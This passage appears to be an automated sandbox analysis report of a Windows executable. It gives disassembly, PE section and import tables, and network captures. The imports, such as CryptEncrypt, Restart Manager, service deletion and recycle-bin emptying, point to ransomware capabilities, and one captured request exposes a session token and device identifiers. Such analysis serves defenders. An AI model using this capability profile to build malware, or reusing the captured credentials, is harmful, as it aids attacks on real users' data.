                                    mov eax, dword ptr [0049F074h]
                                    xor eax, ebp
                                    push eax
                                    mov dword ptr [ebp-10h], eax
                                    push dword ptr [ebp-04h]
                                    mov dword ptr [ebp-04h], FFFFFFFFh
                                    lea eax, dword ptr [ebp-0Ch]
                                    mov dword ptr fs:[00000000h], eax
                                    ret
                                    push eax
                                    push dword ptr fs:[00000000h]
                                    lea eax, dword ptr [esp+0Ch]
                                    sub esp, dword ptr [esp+0Ch]
                                    push ebx
                                    push esi
                                    push edi
                                    mov dword ptr [eax], ebp
                                    mov ebp, eax
                                    mov eax, dword ptr [0049F074h]
                                    xor eax, ebp
                                    push eax
                                    mov dword ptr [ebp-10h], esp
                                    push dword ptr [ebp-04h]
                                    mov dword ptr [ebp-04h], FFFFFFFFh
| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x9db78 | 0xf0 | .rdata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xa4000 | 0x1e0 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xa5000 | 0x5a7c | .reloc |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x953a0 | 0x38 | .rdata |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x9547c | 0x18 | .rdata |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x953d8 | 0x40 | .rdata |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x74000 | 0x320 | .rdata |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |
| Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|
| .text | 0x1000 | 0x72bb6 | 0x72c00 | False | 0.49082584422657954 | data | 6.544529739311217 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rdata | 0x74000 | 0x2adb2 | 0x2ae00 | False | 0.2693888939504373 | data | 3.688258682048505 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .data | 0x9f000 | 0x4b68 | 0x3a00 | False | 0.18561422413793102 | data | 4.779034224413307 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rsrc | 0xa4000 | 0x1e0 | 0x200 | False | 0.52734375 | data | 4.7082365148683625 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .reloc | 0xa5000 | 0x5a7c | 0x5c00 | False | 0.6774796195652174 | data | 6.5688213936338835 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |
| Name | RVA | Size | Type | Language | Country |
|---|---|---|---|---|---|
| RT_MANIFEST | 0xa4060 | 0x17d | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States |
| DLL | Import |
|---|---|
| KERNEL32.dll | Process32NextW, Process32FirstW, CreateProcessW, GetTickCount, CopyFileW, GetCurrentProcess, WriteConsoleW, CreateToolhelp32Snapshot, OpenProcess, WaitForSingleObject, TerminateProcess, FindClose, FindNextVolumeW, GetVolumePathNamesForVolumeNameW, FindVolumeClose, SetVolumeMountPointW, FindFirstVolumeW, QueryDosDeviceW, GetEnvironmentVariableW, GetLogicalDrives, GetProcessHeap, MoveFileExW, SetFilePointerEx, HeapAlloc, CloseHandle, GetLastError, SetFileAttributesW, GetFileAttributesW, CreateFileW, WriteFile, HeapSize, GetConsoleMode, GetConsoleCP, FlushFileBuffers, SetStdHandle, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetCommandLineA, GetOEMCP, GetACP, IsValidCodePage, HeapReAlloc, GetFileType, GetTimeZoneInformation, EnumSystemLocalesW, HeapFree, GetFileSizeEx, GetUserDefaultLCID, IsValidLocale, GetTimeFormatW, GetDateFormatW, GetStdHandle, ReadFile, OpenMutexW, Sleep, CreateMutexW, GetModuleFileNameW, SetEnvironmentVariableW, EncodePointer, DecodePointer, RaiseException, GetCurrentThreadId, IsProcessorFeaturePresent, QueueUserWorkItem, GetModuleHandleExW, EnterCriticalSection, LeaveCriticalSection, TryEnterCriticalSection, DeleteCriticalSection, QueryPerformanceCounter, QueryPerformanceFrequency, FormatMessageW, WideCharToMultiByte, MultiByteToWideChar, FindFirstFileExW, FindNextFileW, GetFileAttributesExW, SetLastError, InitializeCriticalSectionAndSpinCount, CreateEventW, SwitchToThread, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetSystemTimeAsFileTime, GetModuleHandleW, GetProcAddress, WaitForSingleObjectEx, GetStringTypeW, CompareStringW, LCMapStringW, GetLocaleInfoW, GetCPInfo, SetEvent, ResetEvent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, GetStartupInfoW, GetCurrentProcessId, InitializeSListHead, LocalFree, CreateTimerQueue, SignalObjectAndWait, CreateThread, SetThreadPriority, GetThreadPriority, GetLogicalProcessorInformation, CreateTimerQueueTimer, ChangeTimerQueueTimer, DeleteTimerQueueTimer, GetNumaHighestNodeNumber, GetProcessAffinityMask, SetThreadAffinityMask, RegisterWaitForSingleObject, UnregisterWait, GetCurrentThread, GetThreadTimes, FreeLibrary, FreeLibraryAndExitThread, GetModuleHandleA, LoadLibraryExW, GetVersionExW, VirtualAlloc, VirtualProtect, VirtualFree, DuplicateHandle, ReleaseSemaphore, InterlockedPopEntrySList, InterlockedPushEntrySList, InterlockedFlushSList, QueryDepthSList, UnregisterWaitEx, LoadLibraryW, RtlUnwind, ExitProcess |
| ADVAPI32.dll | CryptExportKey, RegCreateKeyW, RegOpenKeyExW, RegSetValueExW, RegCloseKey, CryptReleaseContext, CryptGenKey, CryptImportKey, OpenProcessToken, GetTokenInformation, CloseServiceHandle, OpenSCManagerW, DeleteService, ControlService, EnumDependentServicesW, OpenServiceW, QueryServiceStatusEx, CryptDestroyKey, CryptAcquireContextW, CryptEncrypt, CryptDuplicateKey, RegDeleteValueW |
| SHELL32.dll | SHEmptyRecycleBinW |
| ole32.dll | CLSIDFromString, IIDFromString, CoInitializeEx, CoGetObject, CoInitialize, CoUninitialize, CoCreateInstance, CoInitializeSecurity |
| OLEAUT32.dll | SysAllocStringByteLen, VariantClear, SysAllocString, SysStringByteLen, VariantInit, SysFreeString |
| CRYPT32.dll | CryptStringToBinaryA |
| MPR.dll | WNetGetConnectionW |
| NETAPI32.dll | NetApiBufferFree, NetShareEnum |
| IPHLPAPI.DLL | IcmpSendEcho, IcmpCloseHandle, GetAdaptersInfo, IcmpCreateFile |
| WS2_32.dll | inet_addr |
| RstrtMgr.DLL | RmShutdown, RmRegisterResources, RmStartSession, RmGetList, RmEndSession |
| Language of compilation system | Country where language is spoken | Map |
|---|---|---|
| English | United States | |
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
| Jan 25, 2023 19:45:01.757654905 CET | 49681 | 443 | 192.168.2.3 | 204.79.197.200 |
| Jan 25, 2023 19:45:01.757733107 CET | 443 | 49681 | 204.79.197.200 | 192.168.2.3 |
| Jan 25, 2023 19:45:01.757910967 CET | 49681 | 443 | 192.168.2.3 | 204.79.197.200 |
| Jan 25, 2023 19:45:01.758075953 CET | 49681 | 443 | 192.168.2.3 | 204.79.197.200 |
| Jan 25, 2023 19:45:01.758095980 CET | 443 | 49681 | 204.79.197.200 | 192.168.2.3 |
| Jan 25, 2023 19:45:01.833183050 CET | 443 | 49681 | 204.79.197.200 | 192.168.2.3 |
| Jan 25, 2023 19:45:01.833404064 CET | 49681 | 443 | 192.168.2.3 | 204.79.197.200 |
| Jan 25, 2023 19:45:01.833856106 CET | 49681 | 443 | 192.168.2.3 | 204.79.197.200 |
| Jan 25, 2023 19:45:01.833869934 CET | 443 | 49681 | 204.79.197.200 | 192.168.2.3 |
| Jan 25, 2023 19:45:01.837990046 CET | 49681 | 443 | 192.168.2.3 | 204.79.197.200 |
| Jan 25, 2023 19:45:01.838011026 CET | 443 | 49681 | 204.79.197.200 | 192.168.2.3 |
| Jan 25, 2023 19:45:01.838083982 CET | 49681 | 443 | 192.168.2.3 | 204.79.197.200 |
| Jan 25, 2023 19:45:01.838105917 CET | 443 | 49681 | 204.79.197.200 | 192.168.2.3 |
| Jan 25, 2023 19:45:01.838135958 CET | 49681 | 443 | 192.168.2.3 | 204.79.197.200 |
| Jan 25, 2023 19:45:01.838150978 CET | 443 | 49681 | 204.79.197.200 | 192.168.2.3 |
| Jan 25, 2023 19:45:01.838233948 CET | 49681 | 443 | 192.168.2.3 | 204.79.197.200 |
| Jan 25, 2023 19:45:01.838253975 CET | 443 | 49681 | 204.79.197.200 | 192.168.2.3 |
| Jan 25, 2023 19:45:01.838295937 CET | 49681 | 443 | 192.168.2.3 | 204.79.197.200 |
| Jan 25, 2023 19:45:01.838295937 CET | 49681 | 443 | 192.168.2.3 | 204.79.197.200 |
| Jan 25, 2023 19:45:01.838316917 CET | 443 | 49681 | 204.79.197.200 | 192.168.2.3 |
| Jan 25, 2023 19:45:01.838351965 CET | 49681 | 443 | 192.168.2.3 | 204.79.197.200 |
| Jan 25, 2023 19:45:01.838373899 CET | 49681 | 443 | 192.168.2.3 | 204.79.197.200 |
| Jan 25, 2023 19:45:01.838391066 CET | 49681 | 443 | 192.168.2.3 | 204.79.197.200 |
| Jan 25, 2023 19:45:01.838520050 CET | 443 | 49681 | 204.79.197.200 | 192.168.2.3 |
| Jan 25, 2023 19:45:01.838548899 CET | 443 | 49681 | 204.79.197.200 | 192.168.2.3 |
| Jan 25, 2023 19:45:01.838668108 CET | 49681 | 443 | 192.168.2.3 | 204.79.197.200 |
| Jan 25, 2023 19:45:01.838840961 CET | 443 | 49681 | 204.79.197.200 | 192.168.2.3 |
| Jan 25, 2023 19:45:01.839531898 CET | 443 | 49681 | 204.79.197.200 | 192.168.2.3 |
| Jan 25, 2023 19:45:01.969758034 CET | 443 | 49681 | 204.79.197.200 | 192.168.2.3 |
| Jan 25, 2023 19:45:01.969893932 CET | 49681 | 443 | 192.168.2.3 | 204.79.197.200 |
| Jan 25, 2023 19:45:01.969918966 CET | 443 | 49681 | 204.79.197.200 | 192.168.2.3 |
| Jan 25, 2023 19:45:01.969983101 CET | 443 | 49681 | 204.79.197.200 | 192.168.2.3 |
| Jan 25, 2023 19:45:01.970001936 CET | 49681 | 443 | 192.168.2.3 | 204.79.197.200 |
| Jan 25, 2023 19:45:01.970053911 CET | 49681 | 443 | 192.168.2.3 | 204.79.197.200 |
| Jan 25, 2023 19:45:01.970112085 CET | 49681 | 443 | 192.168.2.3 | 204.79.197.200 |
| Jan 25, 2023 19:45:01.970112085 CET | 49681 | 443 | 192.168.2.3 | 204.79.197.200 |
| Jan 25, 2023 19:45:01.970135927 CET | 443 | 49681 | 204.79.197.200 | 192.168.2.3 |
| Jan 25, 2023 19:45:01.972906113 CET | 49681 | 443 | 192.168.2.3 | 204.79.197.200 |
| Jan 25, 2023 19:45:07.028167963 CET | 49682 | 443 | 192.168.2.3 | 204.79.197.200 |
| Jan 25, 2023 19:45:07.028223991 CET | 443 | 49682 | 204.79.197.200 | 192.168.2.3 |
| Jan 25, 2023 19:45:07.028315067 CET | 49682 | 443 | 192.168.2.3 | 204.79.197.200 |
| Jan 25, 2023 19:45:07.041049957 CET | 49682 | 443 | 192.168.2.3 | 204.79.197.200 |
| Jan 25, 2023 19:45:07.041086912 CET | 443 | 49682 | 204.79.197.200 | 192.168.2.3 |
| Jan 25, 2023 19:45:07.104320049 CET | 443 | 49682 | 204.79.197.200 | 192.168.2.3 |
| Jan 25, 2023 19:45:07.106214046 CET | 49682 | 443 | 192.168.2.3 | 204.79.197.200 |
| Jan 25, 2023 19:45:07.110863924 CET | 49682 | 443 | 192.168.2.3 | 204.79.197.200 |
| Jan 25, 2023 19:45:07.110882998 CET | 443 | 49682 | 204.79.197.200 | 192.168.2.3 |
| Jan 25, 2023 19:45:07.111867905 CET | 49682 | 443 | 192.168.2.3 | 204.79.197.200 |
| Jan 25, 2023 19:45:07.111886024 CET | 443 | 49682 | 204.79.197.200 | 192.168.2.3 |
| Jan 25, 2023 19:45:07.111932039 CET | 49682 | 443 | 192.168.2.3 | 204.79.197.200 |
| Jan 25, 2023 19:45:07.111958981 CET | 443 | 49682 | 204.79.197.200 | 192.168.2.3 |
| Jan 25, 2023 19:45:07.115044117 CET | 49682 | 443 | 192.168.2.3 | 204.79.197.200 |
| Jan 25, 2023 19:45:07.115087986 CET | 443 | 49682 | 204.79.197.200 | 192.168.2.3 |
| Jan 25, 2023 19:45:07.122740984 CET | 49682 | 443 | 192.168.2.3 | 204.79.197.200 |
| Jan 25, 2023 19:45:07.122795105 CET | 443 | 49682 | 204.79.197.200 | 192.168.2.3 |
| Jan 25, 2023 19:45:07.138309002 CET | 49682 | 443 | 192.168.2.3 | 204.79.197.200 |
| Jan 25, 2023 19:45:07.138370991 CET | 443 | 49682 | 204.79.197.200 | 192.168.2.3 |
| Jan 25, 2023 19:45:07.220849991 CET | 443 | 49682 | 204.79.197.200 | 192.168.2.3 |
| Jan 25, 2023 19:45:07.221035004 CET | 443 | 49682 | 204.79.197.200 | 192.168.2.3 |
| Jan 25, 2023 19:45:07.232748985 CET | 49682 | 443 | 192.168.2.3 | 204.79.197.200 |
| Jan 25, 2023 19:45:07.243196011 CET | 49682 | 443 | 192.168.2.3 | 204.79.197.200 |
| Jan 25, 2023 19:45:07.243238926 CET | 443 | 49682 | 204.79.197.200 | 192.168.2.3 |
| Jan 25, 2023 19:45:07.243254900 CET | 49682 | 443 | 192.168.2.3 | 204.79.197.200 |
| Jan 25, 2023 19:45:07.244247913 CET | 49682 | 443 | 192.168.2.3 | 204.79.197.200 |
| Jan 25, 2023 19:45:10.014550924 CET | 49683 | 443 | 192.168.2.3 | 23.35.236.109 |
| Jan 25, 2023 19:45:10.014620066 CET | 443 | 49683 | 23.35.236.109 | 192.168.2.3 |
| Jan 25, 2023 19:45:10.015139103 CET | 49683 | 443 | 192.168.2.3 | 23.35.236.109 |
| Jan 25, 2023 19:45:10.016144991 CET | 49683 | 443 | 192.168.2.3 | 23.35.236.109 |
| Jan 25, 2023 19:45:10.016172886 CET | 443 | 49683 | 23.35.236.109 | 192.168.2.3 |
| Jan 25, 2023 19:45:10.083646059 CET | 443 | 49683 | 23.35.236.109 | 192.168.2.3 |
| Jan 25, 2023 19:45:10.090101004 CET | 49683 | 443 | 192.168.2.3 | 23.35.236.109 |
| Jan 25, 2023 19:45:10.094341993 CET | 49683 | 443 | 192.168.2.3 | 23.35.236.109 |
                                    Jan 25, 2023 19:45:10.094362974 CET4434968323.35.236.109192.168.2.3
                                    Jan 25, 2023 19:45:10.094861984 CET4434968323.35.236.109192.168.2.3
                                    Jan 25, 2023 19:45:10.118664980 CET49683443192.168.2.323.35.236.109
                                    Jan 25, 2023 19:45:10.118767023 CET4434968323.35.236.109192.168.2.3
                                    Jan 25, 2023 19:45:10.138637066 CET4434968323.35.236.109192.168.2.3
                                    Jan 25, 2023 19:45:10.138848066 CET4434968323.35.236.109192.168.2.3
                                    Jan 25, 2023 19:45:10.140302896 CET49683443192.168.2.323.35.236.109
                                    Jan 25, 2023 19:45:10.147821903 CET49683443192.168.2.323.35.236.109
                                    Jan 25, 2023 19:45:10.147821903 CET49683443192.168.2.323.35.236.109
                                    Jan 25, 2023 19:45:10.147864103 CET4434968323.35.236.109192.168.2.3
                                    Jan 25, 2023 19:45:10.147891045 CET4434968323.35.236.109192.168.2.3
                                    Jan 25, 2023 19:45:10.183087111 CET49684443192.168.2.323.35.236.109
                                    Jan 25, 2023 19:45:10.183147907 CET4434968423.35.236.109192.168.2.3
                                    Jan 25, 2023 19:45:10.183239937 CET49684443192.168.2.323.35.236.109
                                    Jan 25, 2023 19:45:10.183417082 CET49684443192.168.2.323.35.236.109
                                    Jan 25, 2023 19:45:10.183446884 CET4434968423.35.236.109192.168.2.3
                                    Jan 25, 2023 19:45:10.249989033 CET4434968423.35.236.109192.168.2.3
                                    Jan 25, 2023 19:45:10.262702942 CET49684443192.168.2.323.35.236.109
                                    Jan 25, 2023 19:45:10.262731075 CET4434968423.35.236.109192.168.2.3
                                    Jan 25, 2023 19:45:10.263421059 CET49684443192.168.2.323.35.236.109
                                    Jan 25, 2023 19:45:10.263439894 CET4434968423.35.236.109192.168.2.3
                                    Jan 25, 2023 19:45:10.284995079 CET4434968423.35.236.109192.168.2.3
                                    Jan 25, 2023 19:45:10.285144091 CET4434968423.35.236.109192.168.2.3
                                    Jan 25, 2023 19:45:10.292181969 CET49684443192.168.2.323.35.236.109
                                    Jan 25, 2023 19:45:10.293242931 CET49684443192.168.2.323.35.236.109
                                    Jan 25, 2023 19:45:10.293242931 CET49684443192.168.2.323.35.236.109
                                    Jan 25, 2023 19:45:10.293282986 CET4434968423.35.236.109192.168.2.3
                                    Jan 25, 2023 19:45:10.293298006 CET4434968423.35.236.109192.168.2.3
                                    Jan 25, 2023 19:45:12.274605036 CET49685443192.168.2.3204.79.197.200
                                    Jan 25, 2023 19:45:12.274682999 CET44349685204.79.197.200192.168.2.3
                                    Jan 25, 2023 19:45:12.274810076 CET49685443192.168.2.3204.79.197.200
                                    Jan 25, 2023 19:45:12.275628090 CET49685443192.168.2.3204.79.197.200
                                    Jan 25, 2023 19:45:12.275682926 CET44349685204.79.197.200192.168.2.3
                                    Jan 25, 2023 19:45:12.344402075 CET44349685204.79.197.200192.168.2.3
                                    Jan 25, 2023 19:45:12.346509933 CET49685443192.168.2.3204.79.197.200
                                    Jan 25, 2023 19:45:12.347239017 CET49685443192.168.2.3204.79.197.200
                                    Jan 25, 2023 19:45:12.347258091 CET44349685204.79.197.200192.168.2.3
                                    Jan 25, 2023 19:45:12.348205090 CET49685443192.168.2.3204.79.197.200
                                    Jan 25, 2023 19:45:12.348223925 CET44349685204.79.197.200192.168.2.3
                                    Jan 25, 2023 19:45:12.348278999 CET49685443192.168.2.3204.79.197.200
                                    Jan 25, 2023 19:45:12.348298073 CET44349685204.79.197.200192.168.2.3
                                    Jan 25, 2023 19:45:12.348474979 CET49685443192.168.2.3204.79.197.200
                                    Jan 25, 2023 19:45:12.348501921 CET44349685204.79.197.200192.168.2.3
                                    Jan 25, 2023 19:45:12.348757982 CET49685443192.168.2.3204.79.197.200
                                    Jan 25, 2023 19:45:12.349118948 CET44349685204.79.197.200192.168.2.3
                                    Jan 25, 2023 19:45:12.349219084 CET49685443192.168.2.3204.79.197.200
                                    Jan 25, 2023 19:45:12.349237919 CET44349685204.79.197.200192.168.2.3
                                    Jan 25, 2023 19:45:12.521493912 CET44349685204.79.197.200192.168.2.3
                                    Jan 25, 2023 19:45:12.521614075 CET49685443192.168.2.3204.79.197.200
                                    Jan 25, 2023 19:45:12.521641970 CET44349685204.79.197.200192.168.2.3
                                    Jan 25, 2023 19:45:12.521713972 CET49685443192.168.2.3204.79.197.200
                                    Jan 25, 2023 19:45:12.521739006 CET44349685204.79.197.200192.168.2.3
                                    Jan 25, 2023 19:45:12.522600889 CET49685443192.168.2.3204.79.197.200
                                    Jan 25, 2023 19:45:12.522600889 CET49685443192.168.2.3204.79.197.200
                                    Jan 25, 2023 19:45:58.100601912 CET804967893.184.221.240192.168.2.3
                                    Jan 25, 2023 19:45:58.100739956 CET4967880192.168.2.393.184.221.240
                                    Jan 25, 2023 19:45:58.270828962 CET4967980192.168.2.393.184.221.240
                                    Jan 25, 2023 19:45:58.270889044 CET4968080192.168.2.3173.222.108.210
                                    Jan 25, 2023 19:45:58.284547091 CET8049680173.222.108.210192.168.2.3
                                    Jan 25, 2023 19:45:58.288470030 CET4968080192.168.2.3173.222.108.210
                                    Jan 25, 2023 19:45:58.291554928 CET804967993.184.221.240192.168.2.3
                                    Jan 25, 2023 19:45:58.308500051 CET4967980192.168.2.393.184.221.240
                                    Jan 25, 2023 19:46:25.131387949 CET49686443192.168.2.3204.79.197.200
                                    Jan 25, 2023 19:46:25.131450891 CET44349686204.79.197.200192.168.2.3
                                    Jan 25, 2023 19:46:25.131552935 CET49686443192.168.2.3204.79.197.200
                                    Jan 25, 2023 19:46:25.131990910 CET49686443192.168.2.3204.79.197.200
                                    Jan 25, 2023 19:46:25.132011890 CET44349686204.79.197.200192.168.2.3
                                    Jan 25, 2023 19:46:25.224256039 CET44349686204.79.197.200192.168.2.3
                                    Jan 25, 2023 19:46:25.224395990 CET49686443192.168.2.3204.79.197.200
                                    Jan 25, 2023 19:46:25.224802017 CET49686443192.168.2.3204.79.197.200
                                    Jan 25, 2023 19:46:25.224828005 CET44349686204.79.197.200192.168.2.3
                                    Jan 25, 2023 19:46:25.225864887 CET49686443192.168.2.3204.79.197.200
                                    Jan 25, 2023 19:46:25.225883007 CET44349686204.79.197.200192.168.2.3
                                    Jan 25, 2023 19:46:25.225972891 CET49686443192.168.2.3204.79.197.200
                                    Jan 25, 2023 19:46:25.225995064 CET44349686204.79.197.200192.168.2.3
                                    Jan 25, 2023 19:46:25.226012945 CET49686443192.168.2.3204.79.197.200
                                    Jan 25, 2023 19:46:25.226028919 CET44349686204.79.197.200192.168.2.3
                                    Jan 25, 2023 19:46:25.226218939 CET49686443192.168.2.3204.79.197.200
                                    Jan 25, 2023 19:46:25.226355076 CET44349686204.79.197.200192.168.2.3
                                    Jan 25, 2023 19:46:25.226758003 CET44349686204.79.197.200192.168.2.3
                                    Jan 25, 2023 19:46:25.226934910 CET49686443192.168.2.3204.79.197.200
                                    Jan 25, 2023 19:46:25.227015018 CET44349686204.79.197.200192.168.2.3
                                    Jan 25, 2023 19:46:25.413876057 CET44349686204.79.197.200192.168.2.3
                                    Jan 25, 2023 19:46:25.414073944 CET49686443192.168.2.3204.79.197.200
                                    Jan 25, 2023 19:46:25.414256096 CET49686443192.168.2.3204.79.197.200
                                    Jan 25, 2023 19:46:25.414319992 CET44349686204.79.197.200192.168.2.3
                                    Jan 25, 2023 19:46:25.414392948 CET49686443192.168.2.3204.79.197.200
                                    Jan 25, 2023 19:46:46.874506950 CET49673443192.168.2.3204.79.197.200
                                    Jan 25, 2023 19:46:59.524652958 CET804967893.184.221.240192.168.2.3
                                    Jan 25, 2023 19:46:59.524837017 CET4967880192.168.2.393.184.221.240
                                     Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                     Jan 25, 2023 19:45:18.062972069 CET | 51300 | 274 | 192.168.2.3 | 192.168.2.1
                                     Jan 25, 2023 19:46:24.221510887 CET | 138 | 138 | 192.168.2.3 | 192.168.2.255
                                     Timestamp | Source IP | Dest IP | Checksum | Code | Type
                                     Jan 25, 2023 19:45:17.621686935 CET | 192.168.2.3 | 192.168.2.1 | f7fc | | Echo
                                     Jan 25, 2023 19:45:17.621732950 CET | 192.168.2.1 | 192.168.2.3 | fffc | | Echo Reply
                                     Jan 25, 2023 19:45:18.063033104 CET | 192.168.2.1 | 192.168.2.3 | 8308 | (Port unreachable) | Destination Unreachable
                                    • https:
                                      • www.bing.com
                                    • fs.microsoft.com
                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                     0 | 192.168.2.3 | 49677 | 204.79.197.200 | 443 | C:\Users\user\Desktop\98j0BL6iLT.exe
                                     Timestamp | kBytes transferred | Direction | Data
                                     2023-01-25 18:44:58 UTC | 0 | OUT | POST /threshold/xls.aspx HTTP/1.1
                                    Origin: https://www.bing.com
                                    Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
                                    Content-type: text/xml
                                    X-MSEdge-ExternalExpType: JointCoord
                                    X-MSEdge-ExternalExp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40
                                    X-PositionerType: Desktop
                                    X-Search-CortanaAvailableCapabilities: CortanaExperience,SpeechLanguage
                                    X-Search-SafeSearch: Moderate
                                    X-Device-MachineId: {A2AB526A-D38D-4FC9-8BA0-E34B8D6354E8}
                                    X-UserAgeClass: Unknown
                                    X-BM-Market: US
                                    X-BM-DateFormat: M/d/yyyy
                                    X-CortanaAccessAboveLock: false
                                    X-Device-OSSKU: 48
                                    X-BM-DTZ: -420
                                    X-BM-FirstEnabledTime: 132061295966656129
                                    X-DeviceID: 0100748C09004E33
                                    X-BM-DeviceScale: 100
                                    X-Search-TimeZone: Bias=480; DaylightBias=-60; TimeZoneKeyName=Pacific Standard Time
                                    X-BM-Theme: 000000;0078d7
                                    X-BM-DeviceDimensionsLogical: 1232x1024
                                    X-BM-DeviceDimensions: 1232x1024
                                    X-Search-RPSToken: t%3DEwDYAkR8BAAUcvamItSE/vUHpyZRp3BeyOJPQDsAAXwwSr16TwZxvghymg//XETj6Tm1HeWPPaa%2Bp3rbli/mvLOk/T6EkvQNUk399UzR3LIX4M/iQEWA7aQU%2BOfqpbEzl5FRxfViukt0nIOJC4GauVchsCLJf/OzsxoL8utB7g00/KCY%2BTs3oE5N9riluRal8eU6Lp1ZeKUF8E3dAd1WdY2OYkiMfIN6hKZymZE77pW/tUmE8J2cLrx40JkPjrOcc97Ka4s6MWsJQjAgG45Zgaw8ZAMII6%2Bh9%2BCunAdSjJkPBj6AG540X%2BB/1oCnPjGVdu/hkAggEmOTH%2BMrTonvu5uKb2W9CXRw6SSDX3iq2ZPiFJjju9%2BmNMHjpZf/rnwDZgAACPnVUJ8qmC%2B3qAHxPY%2BYLLGbXL3O%2BvyWnRNXbqpplR/SNfFS3pzS7lkShmCUmyiwax%2Bl4lLGzKvky6WQGfBUQsanWoOo38%2BGqTYOiSdJllW7r%2BTuLEeq6JUw33Lxr/TxnJ%2B58Zwuvn1wQ3WRGrQDwQyBIv//mDpGhB%2BEWVL2NAg0j0VsA2TI%2BaLgas6IJ64Xh%2BNzAw/K5ZBIt2wC5DtbafbNFDsyJu2IPWcuCXlodod0bXMQ4Vp%2BSeJxMnivHScTVa6g9gzPVuwrGWxLDLIyLX0PBk8Vtxf2iPg85vCv%2Ba6yIu9PMJpqJUzGVENLWVod%2B4tYQ2vWUJJaZDLN191JnF5s12cdic/XLMbHIjhyhX4QA0hkvf%2B2gret8Fsy/8VhtgtUQPskWn5Bk0vrmTVXVszRUs5230czaLlSQyKRH3GXkihUKMGnwj/U3vaTXVT/0xRBEwKjx95iiDkLVgrCdgH7PNRFII62usTlSZ6Bm9JbgyetkWyU2BsE4XvEr2NLqaCLUAhsj%2Bq32LZSv6VHIAmPz5JgFwgM4r7bzWT4ubL0GWqeXOX502lQL724mOtyICas1gE%3D%26p%3D
                                    X-Agent-DeviceId: 0100748C09004E33
                                    X-BM-CBT: 1660685844
                                    X-Device-isOptin: true
                                    X-Device-Touch: false
                                    X-Device-ClientSession: D8F6B43E3D444318ACE6FB571E033018
                                    X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI
                                    X-BM-ClientFeatures: pbitcpdisabled,AmbientWidescreen,rs1musicprod,CortanaSPAXamlHeader
                                    Accept: */*
                                    Accept-Language: en-US
                                    Accept-Encoding: gzip, deflate, br
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.10.7.17134; 10.0.0.0.17134.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134
                                    Host: www.bing.com
                                    Content-Length: 87284
                                    Connection: Keep-Alive
                                    Cache-Control: no-cache
                                    Cookie: MUID=1E17B9B70E9B4C6E957D159ED3646FFF; _SS=CPID=1674704691087&AC=1&CPH=4ef661f2
                                     2023-01-25 18:44:58 UTC | 2 | OUT | Data Ascii: <ClientInstRequest><CID>14D5A69ABEFF69620145AD05BFC76858</CID><Events><E><T>Event.ClientInst</T><IG>b89ebe28cfe9415f8ade38bcffd52e8a</IG><D><![CDATA[{"CurUrl":"https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init","Pivot":"QF","CF":"pbitcpdisabled,Ambie
                                     2023-01-25 18:44:58 UTC | 18 | OUT | Data Ascii: TS></E><E><T>Event.CIQueueError</T><IG>7385de8625fb4310b705970b28d558b3</IG><D><![CDATA[{"CurUrl":"https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init","Pivot":"QF","CF":"pbitcpdisabled,AmbientWidescreen,rs1musicprod,CortanaSPAXamlHeader","errorType":"
                                     2023-01-25 18:44:58 UTC | 34 | OUT | Data Ascii: @1/-1/-1/-1/-1/-1/-1+cs/r//@0/manifest%2Fthreshold.appcache/other/0/@1/cs/-1/cs/-1/-1/-1+cz/s//@0/Framework/@3/0/@1/cz/-1/cz/d0/d0/d0+e1/t//@0/threshold%2Fxls.aspx/xmlhttprequest/0/@1/e1/-1/e1/-1/-1/-1+et/u//@0/V2%2F2,SWVS//0/@1/-1/-1/-1/-1/-1/-1+et/v//@0
